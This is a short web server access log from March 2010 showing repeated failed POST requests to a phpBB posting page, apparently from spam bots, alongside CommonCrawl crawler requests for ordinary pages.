64.120.232.58 - - [11/Mar/2010:17:41:33 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:41:46 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:42:02 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:42:06 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:42:27 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:42:34 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:42:37 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
38.107.191.80 - - [11/Mar/2010:17:42:54 -0800] "GET /main.php HTTP/1.1" 200 5326 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.webmaster-showcase.net"
38.107.191.81 - - [11/Mar/2010:17:42:59 -0800] "GET /yahoo/ssiexamples.html HTTP/1.1" 200 2547 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.webmaster-showcase.net"
38.107.191.82 - - [11/Mar/2010:17:43:03 -0800] "GET /nav.php HTTP/1.1" 200 4763 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:43:05 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
38.107.191.83 - - [11/Mar/2010:17:43:07 -0800] "GET /response.php HTTP/1.1" 200 3183 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:43:09 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
38.107.191.84 - - [11/Mar/2010:17:43:12 -0800] "GET /logs/showfile.php/access_090509.log HTTP/1.1" 200 1595 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.webmaster-showcase.net"
38.107.191.80 - - [11/Mar/2010:17:43:18 -0800] "GET /yahoo/customerror.php HTTP/1.1" 200 8379 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:43:22 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
38.107.191.81 - - [11/Mar/2010:17:43:23 -0800] "GET / HTTP/1.1" 200 686 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.webmaster-showcase.net"
Home
Show Me How Feedback
Last updated: Wed Apr 17 23:48:56 2002